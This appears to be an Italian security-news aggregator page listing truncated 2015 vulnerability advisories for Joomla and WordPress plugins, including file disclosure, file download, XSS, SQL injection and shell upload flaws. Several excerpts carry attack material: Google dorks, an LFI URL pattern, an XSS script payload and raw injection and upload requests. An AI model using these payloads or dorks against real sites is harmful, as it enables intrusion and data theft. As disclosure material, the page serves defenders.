Joomla Docman Path Disclosure / Local File Inclusion

16 luglio 2015 - Fonte: http://www.mondounix.com
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
...

Leggi il seguito »

WordPress Image Export 1.1 Arbitrary File Download

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
     ...

Leggi il seguito »

WordPress Plotly 1.0.2 Cross Site Scripting

16 luglio 2015 - Fonte: http://www.mondounix.com
Details
================
Software: Plotly
Version: 1.0.2
Homepage: http://wordpress.org/plugins/wp-plotly/
Advisory report: https://security.dxw.com/advisories/stored-xss-in-plotly-allows-less-privileged-users-to-insert-arbitrary-javascript-into-posts/
CVE: CVE-2015-5484
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Stored XSS in Plotly allows less privileged users to insert arbitrary JavaScript into posts
 
Vulnerability
================
This plugin allows users who do not have the unfiltered_html capability to insert JavaScript into posts/pages which gets executed by the browsers of other users.
On single sites, only Administrators have the unfiltered_html capability, and on multisite,...

Leggi il seguito »

WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad...

Leggi il seguito »

WordPress Floating Social Bar 1.1.5 Cross Site Scripting

16 luglio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
Everyone can access save_order().
 
File: floating-social-bar\class-floating-social-bar.php
 
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
 
$_REQUEST['items'] is not escaped.
 
http://security.szurek.pl/floating-social-bar-115-xss.html
 
2. Proof of Concept
 
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
 
XSS...

Leggi il seguito »

WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

13 luglio 2015 - Fonte: http://www.mondounix.com
Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the...

Leggi il seguito »

WordPress PictoBrowser 0.3.1 CSRF / XSS

13 luglio 2015 - Fonte: http://www.mondounix.com
**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning...

Leggi il seguito »

WordPress WP-SwimTeam 1.44.10777 Arbitrary File Download

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
 
 
 50             $file = urldecode($args['file'])...

Leggi il seguito »

Joomla J2Store 3.1.6 SQL Injection

13 luglio 2015 - Fonte: http://www.mondounix.com
J2Store v3.1.6, a Joomla! extension that adds basic store functionality to
a Joomla! instance, suffered from two unauthenticated boolean-blind and
error-based SQL injection vulnerabilities. Since February 2015, J2Store has
had about 16,000 downloads as of this writing.
 
 
The first vulnerability was in the sortby parameter within a request made
while searching for products.
 
POST /index.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:...

Leggi il seguito »

Joomla Simple Image Upload 1.0 Shell Upload

13 luglio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Version: 1.0
# Tested on: MsWin32
 
# Vuln Same to Com_Media Vulnerability
 
# Live Request :
 
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
 
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,...

Leggi il seguito »